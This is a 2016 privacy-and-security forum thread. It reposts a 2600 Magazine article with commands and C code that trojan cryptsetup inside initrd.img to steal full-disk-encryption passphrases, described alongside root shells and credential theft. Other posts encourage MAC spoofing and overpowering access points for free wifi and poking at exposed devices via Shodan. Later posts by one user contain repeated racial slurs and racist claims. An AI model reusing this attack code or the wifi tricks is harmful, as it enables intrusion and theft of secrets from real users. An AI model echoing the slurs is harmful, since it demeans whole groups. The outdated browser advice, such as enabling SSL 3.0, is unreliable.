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the small TIN-FOIL-HAT thread

Posted: Sun Feb 21, 2016 9:17 am
by deran
this thread is meant to be a pile of different security issues on and off line

everything is welcome

ill start with a classix:

the surveillance self defense guide ;" onclick=";return false;

this is kind of a basic understanding of security for you and your puter with lots of basic tutorials, some might wonder why basic, as to some this might be smoking hot news ... well i want to take it further to the sourcecode one day as progression moves on, in the meantime i hope some will read it and practice along :wink:

the small TIN-FOIL-HAT thread

Posted: Sun Feb 21, 2016 10:01 am
by bentech

the small TIN-FOIL-HAT thread

Posted: Sun Feb 21, 2016 5:29 pm
by MadMoonMan
Di di Dah dit dah de dah

the small TIN-FOIL-HAT thread

Posted: Mon Feb 22, 2016 5:48 am
by deran
here you will learn that whole disk protection is useless, as far as your boot partition and mbr arent externaly mounted , ie. usb stick or cd / dvd rom ... ncryption/" onclick=";return false;

Pwning Past Whole Disk Encryption

Published in Winter 2009-2010 (26:4) Issue of 2600 Magazine

0x00 Introduction

When I first started using whole disk encryption in Ubuntu a couple of years ago, I slept better at night. I knew that even if the feds busted into my room while I was out and did whatever they wanted with my hard drive without me knowing, my secrets were still secret. Turns out I was wrong.

I’m going to explain how to steal the disk encryption passphrase and run arbitrary code as root on a computer running Ubuntu with whole disk encryption. I tried this on a friend of mine and managed to steal his disk encryption passphrase, the contents of his passwd and shadow files, SSH credentials for a couple of different servers, and his GnuPG secret key and passphrase. I also got reverse root shells sent to me at regular intervals. I finished up by putting a document on his desktop, digitally signed with his own PGP key, containing his disk encryption passphrase and a link to a defaced page on his web server. All it took was about 10 minutes of physical access while his computer was turned off (and of course, countless hours developing this attack beforehand). I have since apologized to him, and he has still been unsuccessful at pwning me back.

This same technique will work for any Linux distribution that uses dm-crypt for whole disk encryption, which is included by default in Ubuntu, Debian, Fedora Core, and likely others. I’m only focusing on Ubuntu because it’s popular, and that happens to be what my friend was using.

0x10 In a Nutshell

Your whole hard drive is encrypted, so your information is safe from physical attacks, right? Well, no, and the reason is because with most disk encryption solutions, your whole hard drive isn’t actually encrypted, just most of it. Your processor can’t execute encrypted instructions; those need to be decrypted before they get executed. So by default, there must be a program that isn’t encrypted whose purpose is to decrypt the rest of the hard drive. Then the operating system can load and the encrypted data can be accessed.

Since this program is not encrypted, if an attacker has physical access to the computer, she can replace this program with something that does the same thing, only also does some other evll things as well. This can be done by booting to a live CD to access the hard drive or, in case of a BIOS password, just removing the hard drive (which is what I had to resort to). In most Linux implementations of whole disk encryption, the small boot partition remains unencrypted, and everything else is encrypted. This attack works by modifying files in the boot partition to do our evil deeds.

Also, we’re using a computer for this attack, which means we can write programs to automate it. It becomes as easy as: pop in a live CD, boot up, run a script, shut down, remove CD, and the victim is pwned, despite disk encryption.

In Windows, disk encryption using both PGP Desktop and TrueCrypt must work the same way, by installing a small unencrypted program that’s used to decrypt the rest of the drive. So, theoretically, these two disk encryption solutions must be vulnerable to this same attack.

0x20 The Vulnerable initrd.img

In Ubuntu, the boot partition holds two files necessary to boot into your operating system: vmlinuz and initrd.img. They have the kernel version appended to the end of their filenames. You can tell the exact names by looking at your grub menu file /boot/grub/menu.1st. This is from mine:

title Ubuntu 8.04.1, kernel 2.6.24-21-generic
root: (hd0,0)
kernel /vmlinuz-2.6.24-21-generic root=/dev/mapper/ubuntu-root ro quiet splash
initrd /initrd.img-2.6.24-21-generic

The vmlinuz file is the compressed Linux kernel that you need when booting up. The initrd.img file is a compressed initial ramdisk made up of a little filesystem full of files required to boot the rest of the way into Linux. It’s only necessary to have an initrd.img file when you need to do some special things before you boot all the way into the OS, like load extra kernel modules and unlock the encrypted hard drive. If you have multiple Linux kernels installed, you’ll have multiple vmlinuz and initrd.img files in your boot partition.

So how does this all work? You turn on your computer and boot to your hard drive. Grub loads menu.1st and autoselects the first option for you, and an Ubuntu logo pops up and your system starts booting. Your initrd.img file gets decompressed in memory. It’s essentially a filesystem with lots of common commands, including the /bin/sh shell. It has an executable script called /init, which executes everything needed to unlock and mount your encrypted partitions. The /init script gets run, and it in turn runs the program /sbin/cryptsetup, which asks for your passphrase. Once you type in the correct passphrase crypsetup unlocks the encrypted section of your hard drive, and then the /init script mounts all the partitions, and does other startup stuff. Once this is complete, the initrd.img filesystem closes and the OS starts to load the rest of the way.

initrd.img files are compressed with cpio, and then compressed again with gzip. Here’s an easy way to decompress your initrd file to see what’s inside:

m0rebel@ubuntu:~$ cd /tmp
m0rebel@ubuntu:/tmp$ mkdir initrd
m0rebel@ubuntu:/tmp$ cd initrd/
m0rebel@ubuntu:/tmp/initrd$ cp /boot/initrd.img-2.6.24-21-generic ./initrd.img.cpio.gz
m0rebel@ubuntu:/tmp/initrd$ gunzip initrd.img.cpio.gz
m0rebel@ubuntu:/tmp/initrd$ cpio -i < initrd.img.cpio
m0rebel@ubuntu:/tmp/initrd$ rm initrd.img.cpio
m0rebel@ubuntu:/tmp/initrd$ ls
bin conf etc init lib modules sbin scripts usr var
m0rebel@ubuntu:/tmp/initrd$ ls -l sbin/cryptsetup
-rwxr-xr-x 1 m0rebel m0rebel 52416 2008-10-20 17:33 sbin/cryptsetup

To recompress initrd.img, do this:

m0rebel@ubuntu:/tmp/initrd$ find . | cpio --quiet --dereference -o -H newc | gzip > /tmp/poisoned-initrd.img

To tie it all together, these files are all stored in /boot/initrd.img on your unencrypted boot partition. An attacker with physical access to a victim’s computer can either boot to a live CD, live USB device, or remove the hard drive and put it in another computer to modify these files.

0x30 Stealing the Crypto Passphrase

To steal the disk encryption passphrase, you need to replace the /sbin/cryptsetup binary in the initrd.img file with an evil one that does your bidding. Luckily, cryptsetup is open source. First, make sure you have all the right development tools and dependencies installed to compile cryptsetup, and the cryptsetup source code.

m0rebel@ubuntu:~$ sudo apt-get install build-essential
m0rebel@ubuntu:~$ sudo apt-get build-dep cryptsetup
m0rebel@ubuntu:~$ mkdir cryptsetup
m0rebel@ubuntu:~$ cd cryptsetup/
m0rebel@ubuntu:~/cryptsetup$ apt-get source cryptsetup
m0rebel@ubuntu:~/cryptsetup$ ls
cryptsetup-1.0.5 cryptsetup_1.0.5-2ubuntu12.diff.gz cryptsetup_1.0.5-2ubuntu12.dsc cryptsetup_1.0.5.orig.tar.gz

The directory cryptsetup-1.0.5 holds the actual source code. It took me a while, searching through the code looking for the “Enter LUKS passphrase:” prompt, before I found the correct file and line to add my evil code. It turns out that cryptsetup-1.0.5/lib/setup.c, around line 650, is the correct place. Right before line 650 is this if statement:

if((r = LUKS_open_any_key(options->device, password, passwordLen, &hdr, &mk, backend)) < 0) {
set_error("No key available with this passphrase.\n");
goto out1;

This basically means, “if the passphrase that was just entered doesn’t work, give an error message and then jump to another part of the code.” Right after that, add my evil code:

if((r = LUKS_open_any_key(options->device, password, passwordLen, &hdr, &mk, backend)) < 0) {
set_error("No key available with this passphrase.\n");
goto out1;
/* begin evil code */
else {
system("/bin/mkdir /mntboot");
system("/bin/mount -t ext3 /dev/sda1 /mntboot");
FILE *fp = fopen("/mntboot/.cryptpass", "w");
fprintf(fp, "%s\n", password);
system("/bin/umount /mntboot");
/* end evil code */

This basically says, “but if the passphrase does work, then create a new directory called /mntboot, mount the unencrypted boot partition to this new directory, create a new file called /mntboot/.cryptpass in this directory, write the encryption passphrase to it, close the file, and unmount the partition.” This will write
the encryption passphrase in plaintext to a file called .cryptpass in the boot partition.

You can then save the file and compile it. After compiling it, I like to build a debian package, then extract it, to see all the files it creates in the right directory structure.

m0rebel@ubuntu:~/cryptsetup/cryptsetup-1.0.5$ ./configure
m0rebel@ubuntu:~/cryptsetup/cryptsetup-1.0.5$ make
m0rebel@ubuntu:~/cryptsetup/cryptsetup-1.0.5$ sudo dpkg-buildpackage
m0rebel@ubuntu:~/cryptsetup/cryptsetup-1.0.5$ cd ..
m0rebel@ubuntu:~/cryptsetup$ mkdir root
m0rebel@ubuntu:~/cryptsetup$ dpkg -x cryptsetup_1.0.5-2ubuntu12_i386.deb root/
m0rebel@ubuntu:~/cryptsetup$ ls -l root/sbin/
total 56 -rwxr-xr-x 1 m0rebel m0rebel 52632 2008-10-20 18:01 cryptsetup

And there you have it: an evil, trojaned cryptsetup binary. Now all you need to do is get a copy of the victim’s initrd.img file from their unencrypted boot partition, extract it, copy root/sbin/cryptsetup to initrd/sbin/cryptsetup, copy root/initramfs-tools/scripts/* to initrd/scripts/, and then recompress the initrd.img file and replace it. The next time the victim boots up and enters their passphrase, a new file will be saved in plaintext in /boot/.cryptopass. Pretty cool, huh?

Most of the attack on my friend relied on this exact same technique, taking the source code from the Ubuntu repository for programs he uses all the time (cryptsetup, openssh, gnupg) and modifying them to be evil.

0x40 Did Someone Say Rootkit?

But it gets better. If you have access to the initrd.img file, you can not only put an evil cryptsetup binary in there, but you can also change around the init script to make it evil. This means that when the computer is booting up, after you steal the encryption passphrase, after cryptsetup unlocks the hard drive, and after the init script mount the encrypted partition, you can then write whatever you want to the root partition.

While pwning my good friend, I made cryptsetup write his encryption passphrase to the ramdisk, not the boot partition. I modifed the init script to then copy his encryption passphrase, a copy of the original, unpoisoned initrd.img file, and a couple of other evil binaries to his root partition. It then added some files to his /etc/init.d and /etc/rcX.d directories to make a couple things run on bootup. After the init script finished executing, and Ubuntu began loading the rest of the way, it ran my init scripts. Keep in mind, these startup scripts get run as root, which spells 0wned.

One of the startup scripts moved the unpoisoned initrd.img back into his boot partition (so this attack wouldn’t happen every time he booted up, only once). It also wrote his encryption passphrase, /etc/passwd, and /etc/shadow to a dump file. It then deleted itself and the files that made it run on boot up. The evil ssh and gpg binaries also wrote passwords to this same dump file. The other startup script ran an evil Python script in the background. This script was an infinite loop that waited 15 minutes, sent me the contents of the dump file over the internet, then waited another 15 minutes and sent a reverse netcat root shell to me.

That’s just how I did it. There are a million other ways to do it, and hackers much more talented than me in rootkit development probably know how to do the same thing, only a lot stealthier.

0x50 Self-Defense

This whole attack relies on modifying unencrypted files on your hard drive, so the defense is simply don’t keep any unencrypted files on your hard drive. Carry them with you on a USB stick instead. This way, if an attacker gets physical access to your computer, all they can do is stare at the encrypted data scratching their heads. You have to make sure you keep a close watch on your USB stick, though. I keep it on my keyring, and never leave it lying around.

While installing Ubuntu, keep a USB stick plugged into your computer. When you get to the partitioner, do a manual partition. Make your USB stick hold /boot, and then make the rest a “physical volume for encryption”. Inside there, make a “physical volume for LVM,” and inside there put your root, swap, and any other
partitions you might want. Install grub to the master boot record of your USB stick, not your internal hard drive.

If you don’t want to reinstall your operating system, you can format your USB stick, copy /boot/* to it, and install grub to it. In order to install grub to it, you’ll need to unmount /boot, remount it as your USB device, modify /etc/fstab, comment out the line that mounts /boot, and then run grub-install /dev/sdb (or wherever your USB stick is). You should then be able to boot from your USB stick.

An important thing to remember when doing this is that a lot of Ubuntu updates rewrite your initrd.img, most commonly kernel upgrades. Make sure your USB stick is plugged in and mounted as /boot when doing these updates. It’s also a good idea to make regular backups of the files on this USB stick, and burn them to CDs or keep them on the internet. If you ever lose or break your USB stick, you’ll need these backups to boot your computer.

One computer I tried setting this defense up on couldn’t boot from USB devices. I solved this pretty simply by making a grub boot CD that chainloaded to my USB device. If you google “Making a GRUB bootable CD-ROM,” you’ll find instructions on how to do that. Here’s what the menu.1st file on that CD looks like:

default 0
timeout 2
title Boot from USB (hd1)
root (hd1)
chainloader +1

I can now boot to this CD with my USB stick in, and the CD will then boot from the USB stick, which will then boot the closely watched initrd.img to load Ubuntu. A little annoying maybe, but it works.

0x60 Conclusion

All this may seem a little paranoid, but ignoring this attack isn’t worth it when you have real secrets to hide, or if you value your privacy. If you’re worried about a competent attacker (and government agents occasionally have their competent moments), you might as well just not encrypt your hard drive. But that’s stupid. Encrypt everything. It’s important to freedom.

the small TIN-FOIL-HAT thread

Posted: Mon Feb 22, 2016 6:51 am
by smokebreaks
That's a whole lotta work for autorun.inf :)


How about shutting that one off? Because that's what "tells" on you.

the small TIN-FOIL-HAT thread

Posted: Tue Feb 23, 2016 10:57 pm
by Jesús Malverde
Freedom fighting for big profits and Porsches? Hmmm.

the small TIN-FOIL-HAT thread

Posted: Wed Feb 24, 2016 12:43 am
by bentech

permission to lose your mind

the small TIN-FOIL-HAT thread

Posted: Wed Feb 24, 2016 5:28 pm
by Jesús Malverde
Ribbon Gymnastics for 200 please, Alex.

the small TIN-FOIL-HAT thread

Posted: Tue Mar 01, 2016 4:55 am
by deran
yeah cool , everybody up and hustling :tup:

today some firefox help

these settings should be changed asap :

"General"->"when Firefox starts"->"Show a blank page"
"General"->"save files to:"Downloads"
"Content"->check:"Block pop-up windows"
"Content"->uncheck:"Enable JavaScript" [optional - NoScript Add-on will block it anyway]
"Content"->"Fonts & Colors"->"Advanced"->"Serif":"Liberation Sans"
"Content"->"Fonts & Colors"->"Advanced"->"Sans-serif":"Liberation Sans"
"Content"->"Fonts & Colors"->"Advanced"->uncheck:"Allow pages to choose their own fonts"
"Content"->"Languages"->choose *only*:"en-us" [remove all others, if any]
"Applications"->choose:"Always ask" for every application - if not possible:choose:"Preview in Firefox/Nightly"
"Privacy"->"Tracking"->check:"Tell websites I do not want to be tracked"
"privacy"->"History"->"Firefox will:"Use custom settings for history"
"privacy"->"History"->uncheck:"Always use private browsing mode"
"privacy"->"History"->uncheck:"Remember my browsing and download history"
"privacy"->"History"->uncheck:"Remember search and form history"
"privacy"->"History"->uncheck:"Accept cookies from sites"
"privacy"->"History"->uncheck:"Accept third-party cookies"
"privacy"->"History"->check:"Clear history when Firefox/Nightly closes"
"privacy"->"History"->"settings":check all -> except:"Site Preferences"
[to enable cookies for certain trusted sites: use:"Exceptions" and paste URL of site and modify settings according to your preference. If you additionally use Cookie-Monster (Add-on) you need to uncheck "Block all cookies" in CM-Options]
"privacy"->"location bar"->"When using the location bar, suggest:"->choose:"Nothing"
"security"->check:"Warn me when sites try to install add-ons"
"security"->check:"Block reported attack sites"
"security"->check:"Block reported web forgeries"
"security"->"Passwords"->uncheck:"Remember passwords for sites"
"security"->"Passwords"->uncheck:"Use a master password"
"advanced"->"General"->"System Defaults"->uncheck:"Submit crash reports"
"advanced"->"General"->"System Defaults"->uncheck:"Submit performance data"
"advanced"->"Update"->check:"Automatically install updates"
"advanced"->"Update"->check:"Warn me if this will disable any of my add-ons"
"advanced"->"Update"->check:"Automatically update Search Engines"
"advanced"->"Encryption"->"Protocols"->check:"Use SSL 3.0"
"advanced"->"Encryption"->"Protocols"->check:"Use TLS 1.0"
"advanced"->"Encryption"->"Certificates"->"When a server requests my personal certificate"->check:"Ask me every time"

about:config <- yeah ... lets mess a bit in here, lots of work can be done there :wink:

dom.battery.enabled = false - otherwise, sites could potentially read the battery status of your computer

dom.event.clipboardevents.enabled = false - otherwise, sites could potentially get a lot of information about what you copy or cut from it, which can even include sensitive information

browser.send_pings = false - this disables sending browser-pings

media.peerconnection.turn.disable = true

media.peerconnection.use_document_iceservers = false = false

media.peerconnection.identity.timeout = 1

webgl.disabled = true

next security trick goes hand in hand with 2 awesome plug ins : ... isconnect/" onclick=";return false; ... g-cookies/" onclick=";return false;

network.cookie.lifetimePolicy = 2 - so that all cookies will be deleted once you close your browser

network.cookie.cookieBehavior = 1 - so that cookies will only be accepted from the site you are visiting, not from third-parties such as ad-networks

privacy.trackingprotection.enabled = true - this enables Firefox' built-in tracking protection

geo.enabled = false - this disables geolocation

and of course some MUST HAVE plug ins :" onclick=";return false; ... ck-origin/" onclick=";return false; ... /noscript/" onclick=";return false; ... rackmenot/" onclick=";return false;

thx for your attention :emp:

the small TIN-FOIL-HAT thread

Posted: Fri Mar 04, 2016 1:28 pm
by smokebreaks

the small TIN-FOIL-HAT thread

Posted: Sat Mar 05, 2016 1:56 am
by MadMoonMan
oh my gorsh....

did you see all that alien interference above in derans broadcast?

I'd like to stress evil aliens are not welcome to come here and kill and murder .. ok they actually are welcome. but should be forewarned . Its do or die. Truth cuts sharp.

the small TIN-FOIL-HAT thread

Posted: Sat Mar 05, 2016 2:07 am
by MadMoonMan
ok.. I been watchin this thread for a minue or and 2 and its up to something suspiciousI Can tell I use to be a spy a long time ago. I cam s,.e;;

the small TIN-FOIL-HAT thread

Posted: Sat Mar 05, 2016 2:09 am
by MadMoonMan
I cant post muy thai secrete messages

the small TIN-FOIL-HAT thread

Posted: Sat Mar 05, 2016 12:20 pm
by deran
just bc they have 8 fingers and like to count to 255 instead of 100 in 1 0 increments, doesnt mean that they are alien :laugh:

the small TIN-FOIL-HAT thread

Posted: Sat Mar 05, 2016 12:38 pm
by deran
that mac changer is really a nice piece of code

i mean, just take "your" clients mac (view it with airodump-ng) and be him in the eyes of the station ...

this trick is also "easy" as most hardware is programmed to choose the stronger signal, to achieve this, get yourself an alfa network adapter, as this is to my knowlegde, the only piece of hardware that can be tweaked softwaresided with a single 1 liner to peak its signal to 500% strength (us in the modern world have limitations regarding signal strength, some countries dont) , and "override" the access point with shear power, grab handshake, or inject, whatever ... surf 4 free
esp easy with those open city networks ;)

the small TIN-FOIL-HAT thread

Posted: Mon Mar 07, 2016 3:41 pm
by deran
yeah, a very important "construction site" ^^

some heard of it, some read about it, some even installed it ;)
DD-WRT is a Linux-based firmware for wireless routers and wireless access points. It is compatible with several models of routers and access points, for example, the Linksys WRT54G series (including the WRT54GL and WRT54GS). DD-WRT is one of the third-party firmware projects, which are designed to replace the original firmware on some commercial routers. Alternative firmware may offer features and functionality sets that differ from the original firmware it is replacing." onclick=";return false;

just grab your router, install new firmware and .." onclick=";return false;

lots of stuff to go through ... :)

why not open a hotspot for free wifi for all ? ;)" onclick=";return false;

bc there cant be enough freedom .. yeah :whistle:

the small TIN-FOIL-HAT thread

Posted: Tue Mar 08, 2016 4:05 pm
by Jesús Malverde
Someone I know helped write a phone OS and he's in total agreement on the "scary" part.

the small TIN-FOIL-HAT thread

Posted: Fri Mar 11, 2016 6:59 pm
by bentech
and just look what their doing to our auto's


the small TIN-FOIL-HAT thread

Posted: Thu Mar 17, 2016 11:21 am
by Jesús Malverde
The robust credentialing for billing purposes makes phone anonymity even less probable than trying to use the web anonymously. Because any fiddling with the credentialing is presumed to be for commercial fraud, you bump up against criminal law very quickly. At least on the internet, there's little actual likelihood of criminal prosecution for spoofing IP addresses and even MACs.

the small TIN-FOIL-HAT thread

Posted: Wed Mar 23, 2016 9:35 pm
by MadMoonMan
Is this one of them sucker things where you can get rich but give me 10 quid first? And I never get my 10 quid back?

the small TIN-FOIL-HAT thread

Posted: Thu Apr 21, 2016 1:36 pm
by deran
so i thought .. why not play with the big boys

enjoy ;)" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Wed Apr 27, 2016 5:50 pm
by MadMoonMan
I just traveled back in time and I"m posting before I read this thread the first time and replying in the future to say

How can a TIN-FOIL-HAT thread be small?

the small TIN-FOIL-HAT thread

Posted: Wed Apr 27, 2016 5:53 pm
by MadMoonMan
oh shit man .... Why does this sound so familiar? du ja vu this Guys!?

see ab ove doh.

I've done that before .. im sure I posted it on here.


proof of deja vu.

the small TIN-FOIL-HAT thread

Posted: Wed Apr 27, 2016 5:55 pm
by MadMoonMan
Cool ... you never know when one of them time warps are gonna happen.


the small TIN-FOIL-HAT thread

Posted: Tue May 03, 2016 4:21 am
by deran
got a new toy to play around :woohoo:" onclick=";return false;
Shodan is a search engine that lets the user find specific types of computers .... Shodan users are able to find systems including traffic lights, security cameras, home heating systems as well as control systems for water parks, gas stations, water plants, power grids, nuclear power plants and particle-accelerating cyclotrons;[citation needed] most have little security.[5][6] Many devices use "admin" as their user name and "1234" as their password, and the only software required to connect to them is a web browser.[6]" onclick=";return false;

find an online coffee machine and brew a coffee in the name of somebody for somebody lol


the small TIN-FOIL-HAT thread

Posted: Thu May 26, 2016 1:30 pm
by bentech
VICE asks Edward Snowden about How to 'Go Black'" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Mon Jun 06, 2016 4:41 pm
by deran
holy bat cow .. this one was very new to me ... damn .. so effective :woohoo: ... -wrenches/" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Tue Jun 07, 2016 11:21 pm
by MadMoonMan

Wheres my ball peen hammer?

If you want to get into something you can


Ex Codebreaker

the small TIN-FOIL-HAT thread

Posted: Tue Jun 07, 2016 11:25 pm
by MadMoonMan
I inserted a code into army computer system ...


Went to lunch.

came back the tech guys were all pissed.. they finally had to reboot system to get things back online so they could go to lunch.

To be honest.. I didn't intend to stump them that bad.

Hey dudes! If you have a hole someone can get in wouldn't you want to know?

the small TIN-FOIL-HAT thread

Posted: Thu Jul 21, 2016 8:37 pm
by bentech
On Thursday at the MIT Media Lab, Snowden and well-known hardware hacker Andrew “Bunnie” Huang plan to present designs for a case-like device that wires into your iPhone’s guts to monitor the electrical signals sent to its internal antennas. The aim of that add-on, Huang and Snowden say, is to offer a constant check on whether your phone’s radios are transmitting. They say it’s an infinitely more trustworthy method of knowing your phone’s radios are off than “airplane mode,” which people have shown can be hacked and spoofed. Snowden and Huang are hoping to offer strong privacy guarantees to smartphone owners who need to shield their phones from government-funded adversaries with advanced hacking and surveillance capabilities—particularly reporters trying to carry their devices into hostile foreign countries without constantly revealing their locations. ... -snitches/" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Thu Jul 21, 2016 10:00 pm
by MadMoonMan

rats it's 1984!

the small TIN-FOIL-HAT thread

Posted: Thu Jul 21, 2016 10:07 pm
by MadMoonMan
One World Government needs what?

Bankers of the World Unite?

Class? Class anyone?

Control of what? Worl... What? World WIDE CoM... Com what? anyone Commmmerrrce.

World Wide Commerce through the banking system.

One world government coming wether you like it or not you can't stop it. All the destruction and worldwide disruption be damed.


the small TIN-FOIL-HAT thread

Posted: Fri Jul 22, 2016 12:31 pm
by smokebreaks
deran wrote:holy bat cow .. this one was very new to me ... damn .. so effective :woohoo: ... -wrenches/" onclick=";return false;

I just bought one of these.. ... 60698.html" onclick=";return false;

Seems to work rather well.

the small TIN-FOIL-HAT thread

Posted: Tue Nov 08, 2016 11:42 pm
by bentech
An anonymous reader quotes a report from Motherboard:
In 2013, the FBI received permission to hack over 300 specific users of dark web email service TorMail. But now, after the warrants and their applications have finally been unsealed, experts say the agency illegally went further, and hacked perfectly legitimate users of the privacy-focused service. "That is, while the warrant authorized hacking with a scalpel, the FBI delivered their malware to TorMail users with a grenade," Christopher Soghoian, principal technologist at the American Civil Liberties Union (ACLU), told Motherboard in an email. The move comes after the ACLU pushed to unseal the case dockets in September. The Department of Justice recently decided to publish redacted versions of related documents. In 2013, the FBI seized Freedom Hosting, a service that hosted dark web sites, including a large number of child pornography sites and the privacy-focused email service TorMail. The agency then went on to deploy a network investigative technique (NIT) -- a piece of malware -- designed to obtain the real IP address of those visiting Freedom Hosting sites. According to the new documents, the NIT was used against users of 23 separate websites. As for TorMail, officials have maintained that the government obtained a warrant to deploy the NIT against specific users of the service. Now, we do know that to be true: recently unsealed affidavits include a total of over 300 redacted TorMail accounts that the FBI wanted to target. All of these accounts were allegedly linked to child pornography-related crimes, according to court documents. Importantly, the affidavits say that the NIT would only be used to "investigate any user who logs into any of the TARGET ACCOUNTS by entering a username and password." But, according to sources who used TorMail and previous reporting, the NIT was deployed before the TorMail login page was even displayed, raising the question of how the FBI could have possibly targeted specific accounts. ... -a-grenade" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Tue Nov 08, 2016 11:57 pm
by MadMoonMan
sIr prYZe sIr prYZe sIr prYZe

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 1:27 pm
by bentech
Some of the world's leading photojournalists and filmmakers are calling on the manufacturers of the cameras they use to add encryption to their products, as the number of threats they face from having their devices seized is "literally too high to count." From a ZDNet report:
Over 150 documentary makers and reporters signed an open letter by the Freedom of the Press Foundation, asking for camera makers -- including Nikon, Sony, and Canon -- to ensure that their work is protected while often "attempting to uncover wrongdoing in the interests of justice." "Documentary filmmakers and photojournalists work in some of the most dangerous parts of the world, often risking their lives to get footage of newsworthy events to the public," said Trevor Timm, the foundation's executive director. But, he said, "they face a variety of threats from border security guards, local police, intelligence agents, terrorists, and criminals when attempting to safely return their footage so that it can be edited and published." The filmmakers say that camera security has lagged behind the rest of the industry, leaving their work "dangerously vulnerable." ... ncryption/" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 2:51 pm
by deran
we canon users are always 2 steps ahead - bitches :fubird: ... ic=10279.0" onclick=";return false;

hacked my dslr already 10 n more years ago ... problem is, journalists who write such crap have no clue about what they are writing what so ever ...

glad i could help :P

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 3:20 pm
by bentech
Yet even as tech companies like WhatsApp and Apple have implemented default encryption in their products strong enough to flummox US law enforcement, standalone camera manufacturers haven’t—perhaps due to the technical challenge, the financial burden, or a combination of both. Third-party software makers, like Canon-focused Magic Lantern, have experimented with adding aftermarket encryption features to cameras, but the code remains relatively untested and requires a complex process of altering the camera’s firmware that goes beyond the average user’s comfort zone. ... d-cameras/" onclick=";return false;

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 4:46 pm
by MadMoonMan
as usual all those promised to help me trim come time can't make it.

so I've developed a new plan. Cut down only what I can trim that day.

Some can go a day or 2 plus from one past experiment I learned a lot of cold low light days for floundering plants can result in amazingly oily sticky buds.

GOOD: More for me

BAD: You know how boring trimming can be? I could be typeing on myplanetganja instead.

Wait a second .. he he he That's what I seem to be doing now.

Mr Obvious: "Are you blind foo?"

Me: "No my eyeballs currently are working as of a few milliseconds ago between light reflection times.... I haven't measured the current smog level in my house which would interfere with the reflection time delay but no not yet if your counting right excactly now. set clock here. I might be before I finish typing this. So far so good.

EDITOR IN CHEF: Do to infinity loops and furthering entanglements this stupidity is hereby rescinded.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 4:54 pm
by MadMoonMan
Clipping Kosher Kush and Burmese Kush

been cut and drying and now I'm doing the final bud cut off the stems.. ready to let air for a day or 2 before starting the mason jar cure process.

sticky fingers. I'm saving the trimmings this time. Try another ice hash.

I liked the last hash but seemed to be a lot of trouble. Looking back slicing that razor blade over that vice compressed chunk of Sweet tooth was pretty damn good. besides I prefer a cigar.

Now I have a vapor thingy. Hash might go pretty good. Test it out. I should live so long.

Don't like vaporization btw.

I built a cheap home test vaporizor with a 60 w light buld plugged into a light and a vapor bag.. plastic air balloon to catch the evaporating smoke.
some tin foil and some wire to hang the tin foil over the lightbulb.

The rubber band goes outside the bottom of the plastic.
or you can use duck tape if your rubber band goes on first then the plastic spastic.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 5:03 pm
by MadMoonMan
Allright .. I gotta stop this shit man.

I'm sposed ta be trimming. not loafing on here?

You think I just get paid to sit on my ass all the time?

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 5:06 pm
by MadMoonMan
I know what your thinking?

Joe Bonabo since its still afternoon

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 5:08 pm
by MadMoonMan
Trying to Kosher last.

Jews gold man


can a nigger in washington dc walk around naked? at noon wearing only a necktie and no one take picttures?

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 5:10 pm
by MadMoonMan
The real racists are those calling you a racist for saying more niggers steal cars than crackers.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 5:14 pm
by MadMoonMan
Which proves with no scientific discussion left available to dispute it. Its settled. There are more black niggers in this world than white niggers. So more black niggers should statistically be arrested than white niggers.

Living in low income nigger gang neighbor hoods where walking down the road you "kin git shot"

I'm leaving beaners and chinks out to keep it simple. I mean like Einsteins inclusion of gravity still hasn't been completely reconciled yet.

Anyone suggests Japs should be included gets taken behind the barn and dissappears.

Ssshhh shut up heres comes ....

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:18 pm
by MadMoonMan


i surrender to only Chief Running Boar or no surrender.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:27 pm
by MadMoonMan
sigh someone has to trim the bud

or it doesn't get done.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:39 pm
by MadMoonMan
types wifff weely weely sticky fingers

forgot what i was gonna say

ok back to trimming.. long way to go .. partway through the koser

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:48 pm
by MadMoonMan
Oh yeah I remembered now I wanted to say... oh gosh.. and my fingers are so sticky lol i was able to type this but my brain for got again

Hey no laughing we are all retards in a way.

Looks out at audience.. you there Clara you wanted a blue eyeball for your so called skiing accident in Wyomning .. wink your working eye once for yes.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:49 pm
by MadMoonMan
olol oh yeah i remember now.. I put some of this fresh b ulby bulbs off and stuffed in my pipe get some of dat fresh fruits of oil.

Back to trimmin

While jamming Blaze of Glory on tv


or no soup for you!

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 6:57 pm
by MadMoonMan
kosher is done now to the last burmese rack

I took a deep breath before starting this to finish it.


Me and my big mouth.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 7:02 pm
by MadMoonMan
Why is there always a box of votes you left in the trunk and you forgot about?

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 7:46 pm
by MadMoonMan
ok in the case of a rack of burmese kush strung on a hanger..

its good news not bad news.

trimming is zen

I joke I don't like it

Mickey Mouse is gay and Minnie Mouse the girl has some really tiny tits.

when you look at every thing closely.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 7:49 pm
by MadMoonMan
Like for example take the movie rodger rabbit. Evryone says Jessica shows her bunny area thing and everyone is re running it and rerunning it to see Jessicas bunnys thing but when I looked at it she didn't have any thing there. I don't get it?

Maybe its because I'm a virgin I wouldn't know what a thing looked like in the first place.

the small TIN-FOIL-HAT thread

Posted: Wed Dec 14, 2016 8:01 pm
by MadMoonMan
